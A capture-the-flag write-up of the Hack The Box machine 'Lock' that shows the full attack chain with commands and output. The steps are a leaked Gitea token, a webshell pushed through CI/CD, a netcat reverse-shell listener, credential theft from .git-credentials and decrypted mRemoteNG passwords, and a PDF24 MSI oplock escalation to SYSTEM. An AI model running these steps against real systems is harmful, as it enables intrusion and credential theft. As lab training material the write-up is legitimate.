HTB Lock CTF Writeup
A Gitea API key leaked in git commit history reveals a private repository with active CI/CD; deploying a webshell via git push yields a foothold. mRemoteNG credentials are decrypted to pivot to another user, and a PDF24 MSI repair local privilege escalation via opportunistic lock (oplock) abuse grants a SYSTEM shell.
HTB Lock CTF
Gitea Enumeration
Gitea is running on port 3000. There’s a public repository named “dev-scripts”. The repository has 2 commits. When inspecting the second (latest) commit for changes, it’s possible to see that they left an API key hardcoded:
The API key is:
1
43ce39bb0bd6bc489284f2905f033ca467a6362f
I did clone the repository:
1
2
3
4
5
6
7
8
$ git clone http://10.129.15.248:3000/ellen.freeman/dev-scripts.git
Cloning into 'dev-scripts'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 6 (delta 1), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (6/6), done.
Resolving deltas: 100% (1/1), done.
When using the script with the leaked API key, we see there’s one more repository we don’t see as an unauthenticated user (website):
1
2
3
4
5
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/dev-scripts$ export GITEA_ACCESS_TOKEN=43ce39bb0bd6bc489284f2905f033ca467a6362f
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/dev-scripts$ python3 repos.py http://10.129.15.248:3000/
Repositories:
- ellen.freeman/dev-scripts
- ellen.freeman/website
The reference for the gitea API is at http://10.129.15.248:3000/api/swagger
I clicked the “authorize” button and used the api key to authorize

However, after exploring the API, I couldn’t find anything useful. After some research, I discovered it’s possible to clone repositories using the PAT (personal access token)
Using the token as password, I cloned the website repository:
1
2
3
4
5
6
7
8
9
10
$ git clone http://10.129.15.248:3000/ellen.freeman/website.git
Cloning into 'website'...
Username for 'http://10.129.15.248:3000': ellen.freeman
Password for 'http://[email protected]:3000':
remote: Enumerating objects: 165, done.
remote: Counting objects: 100% (165/165), done.
remote: Compressing objects: 100% (128/128), done.
remote: Total 165 (delta 35), reused 153 (delta 31), pack-reused 0
Receiving objects: 100% (165/165), 7.16 MiB | 461.00 KiB/s, done.
Resolving deltas: 100% (35/35), done.
There’s a readme file in the website repo, saying that the CI/CD integration is up (meaning, changes to the webserver will be automatically deployed)
I added the antak webshell to the repo and pushed it to main:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock$ mv antak.aspx website/
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock$ cd website/
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/website$ git status
On branch main
Your branch is up to date with 'origin/main'.
Untracked files:
(use "git add <file>..." to include in what will be committed)
antak.aspx
nothing added to commit but untracked files present (use "git add" to track)
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/website$ git add .
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/website$ git commit -m 'feat: add webshell'
[main 76dcf2c] feat: add webshell
1 file changed, 270 insertions(+)
create mode 100644 antak.aspx
(.venv) user@attackbox:~/hacking/htb/machines/easy/lock/website$ git push
Username for 'http://10.129.15.248:3000': ellen.freeman
Password for 'http://[email protected]:3000':
Enumerating objects: 4, done.
Counting objects: 100% (4/4), done.
Delta compression using up to 5 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (3/3), 4.16 KiB | 4.16 MiB/s, done.
Total 3 (delta 1), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://10.129.15.248:3000/ellen.freeman/website.git
73cdcc1..76dcf2c main -> main
The shell was available right away in the webserver at http://10.129.15.248/antak.aspx
Remote Code Execution
After uploading antak webshell, I created a powershell encoded payload (via revshells.com) to get a reverse shell going.
1
2
3
4
5
6
7
$ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.112] from (UNKNOWN) [10.129.15.248] 58861
PS C:\windows\system32\inetsrv> PS C:\windows\system32\inetsrv>
PS C:\windows\system32\inetsrv>
Lateral Movement
Credential Hunting
Found credentials for ellen.freeman
1
2
PS C:\users\ellen.freeman> type .git-credentials
http://ellen.freeman:YWFrWJk9uButLeqx@localhost:3000
Also found a config file for mRemoteNG in ellen.freeman’s Documents folder (C:\users\ellen.freeman\Documents):
I used a python script from a github repository to decrypt the password (https://github.com/gquere/mRemoteNG_password_decrypt):
1
2
3
4
5
$ python3 mremoteng_decrypt.py ~/hacking/htb/machines/easy/lock/config.xml
Name: RDP/Gale
Hostname: Lock
Username: Gale.Dekarios
Password: ty8wnW9qCKDosXo6
The credential is indeed valid:
I used xfreerdp to connect to the server:
1
$ xfreerdp /v:10.129.15.248 /u:'Gale.Dekarios' /p:'ty8wnW9qCKDosXo6'
The user flag is in gale.dekarios’ desktop folder.
There is a non-default app in dekarios’ desktop folder:
The software version can be found easily via the system tray icon:
A quick google search revealed that this version is prone to a local privilege escalation vulnerability (https://sec-consult.com/vulnerability-lab/advisory/local-privilege-escalation-via-msi-installer-in-pdf24-creator-geek-software-gmbh/) by using the MSI installer.
To locate the MSI installer for this specific version, I first noticed how the naming scheme looks like for the file name thanks to the blog post
And used the cmd below to locate the file in the C drive:
1
2
3
C:\Users\gale.dekarios>cmd.exe /c "where /R C:\ pdf24-creator-11.15.1-x64.msi 2>nul"
C:\_install\pdf24-creator-11.15.1-x64.msi
I downloaded the tool described in the blog post (https://github.com/googleprojectzero/symboliclink-testing-tools/releases/tag/v1.0):
I used xfreerdp’s drive feature to upload the tool to the machine:
1
user@attackbox:~/hacking/htb/machines/easy/lock$ xfreerdp /v:10.129.15.248 /u:'Gale.Dekarios' /p:'ty8wnW9qCKDosXo6' /drive:bsec,.
It worked, the drive was created in my rdp session:
I copied SetOpLock.exe to the machine.
I started the repair process:
1
msiexec.exe /fa C:\_install\pdf24-creator-11.15.1-x64.msi
When the repair window popped up, I used SetOpLock:
1
2
3
C:\Users\gale.dekarios>cd Desktop
C:\Users\gale.dekarios\Desktop>.\SetOpLock.exe "C:\Program Files\PDF24\faxPrnInst.log" r
Then, after a few seconds, at the very end of the repair process, pdf24-PrinterInstall.exe runs but does not close. I can use that window to go on Properties:
Click to learn more about the legacy console mode:
When you click on it, you’re presented with a popup to select a web browser:
The article says specifically not to use edge or internet explorer because it does not run as SYSTEM. Thankfully, Firefox is present on the system. Select Firefox to open.
Then, when firefox opens, press “Ctrl + O” and open cmd.exe:
cmd.exe will appear in the downloads tab. Open it to have a SYSTEM shell.

















